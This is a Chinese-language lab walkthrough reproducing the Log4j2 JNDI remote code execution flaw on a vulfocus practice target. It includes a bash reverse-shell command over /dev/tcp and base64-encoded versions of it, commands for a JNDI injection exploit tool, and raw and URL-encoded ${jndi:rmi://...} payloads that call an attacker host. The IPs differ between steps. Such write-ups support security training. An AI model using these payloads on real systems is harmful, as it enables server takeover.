Apache Log4j 是一個(gè)基于Java的日志記錄工具。經(jīng)過多年的開發(fā)迭代,Log4j 1.x的維護(hù)已經(jīng)變得非常困難,因?yàn)樗枰c非常舊的 Java 版本兼容,所以于 2015 年 8 月正式升級(jí)為L(zhǎng)og4j2。黑客可以惡意構(gòu)造特殊數(shù)據(jù)請(qǐng)求包payload觸發(fā)漏洞,從而可以在目標(biāo)服務(wù)器上執(zhí)行任意代碼,導(dǎo)致服務(wù)器被控制。
受影響版本:2.0-beta9<= Apache Log4j<= 2.15.0-rc1
使用工具:
Base64在線編碼工具
url在線編碼工具
burpsuite
JNDI注入利用工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(生成JNDI鏈接并啟動(dòng)后端相關(guān)服務(wù),可用于Fastjson、Jackson等相關(guān)漏洞的驗(yàn)證)
GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入測(cè)試工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)
二、復(fù)現(xiàn)過程登錄網(wǎng)站https://vulfocus.cn/ ,打開這個(gè)鏡像vulfocus/log4j2-rce-2021-12-09
1.登錄
2.在首頁(yè)啟動(dòng)靶場(chǎng)并訪問靶場(chǎng)地址
![在這里插入圖片描述](https://img-blog.csdnimg.cn/a15c0485ea92420f892ab291ebc560f6.png
3.點(diǎn)擊?????并抓包
vulfocus給我們提供的環(huán)境是/hello請(qǐng)求中傳遞的payload參數(shù),我們只需要嘗試在提交的payload參數(shù)中添加我們要插入的payload就好了
4.在攻擊機(jī)開啟監(jiān)聽
5.構(gòu)造執(zhí)行反彈shell命令的攻擊payload
攻擊命令:bash -i >& /dev/tcp/192.168.25.129/12345 0>&1 //根據(jù)實(shí)際情況修改對(duì)應(yīng)的IP、端口將要執(zhí)行的命令進(jìn)行base64編碼,可通過Java Runtime 配合 bash 編碼實(shí)現(xiàn)。反彈shell命令經(jīng)過base64編碼:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4xNTAuNi8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}
原因:由于Runtime執(zhí)行l(wèi)inux命令時(shí)管道符不生效,所以需要將命令進(jìn)行加密
本次復(fù)現(xiàn)在攻擊機(jī)使用JNDI注入利用工具(構(gòu)建ldap服務(wù))生成payload:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMS4xNDEvMTIzNDUgMD4mMQoK}|{base64,-d}|{bash,-i}” -A “192.168.101.141”
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "編碼后的bash反彈shell命令" -A “監(jiān)聽的IP地址”
![在這里插入圖片描述](https://img-blog.csdnimg.cn/3428a933d0c2491f86bcf90d45620c1d.png)
6.利用靶機(jī)地址去訪問攻擊機(jī)的JNDI服務(wù)
命令:payload=${jndi:生成的rmi}
將payload進(jìn)行url編碼:
payload=${jndi:rmi://81.70.150.6:1099/s8jz7d
![在這里插入圖片描述](https://img-blog.csdnimg.cn/efe085bbd6044cda8805a84dea7b6445.png)
發(fā)送payload
payload%3D%24%7Bjndi%3Armi%3A%2F%2F192.168.101.141%3A8090%2Fjnzm2a%7D
![在這里插入圖片描述](https://img-blog.csdnimg.cn/2648f662395f4060abc0e99cfeb2d8f4.png)
你是否還在尋找穩(wěn)定的海外服務(wù)器提供商?創(chuàng)新互聯(lián)www.cdcxhl.cn海外機(jī)房具備T級(jí)流量清洗系統(tǒng)配攻擊溯源,準(zhǔn)確流量調(diào)度確保服務(wù)器高可用性,企業(yè)級(jí)服務(wù)器適合批量采購(gòu),新人活動(dòng)首月15元起,快前往官網(wǎng)查看詳情吧
分享題目:vulfocus復(fù)現(xiàn):log4j2-rce-2021-12-09-創(chuàng)新互聯(lián)
鏈接地址:http://muchs.cn/article6/ceegog.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供自適應(yīng)網(wǎng)站、ChatGPT、面包屑導(dǎo)航、定制網(wǎng)站、網(wǎng)站收錄、服務(wù)器托管
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容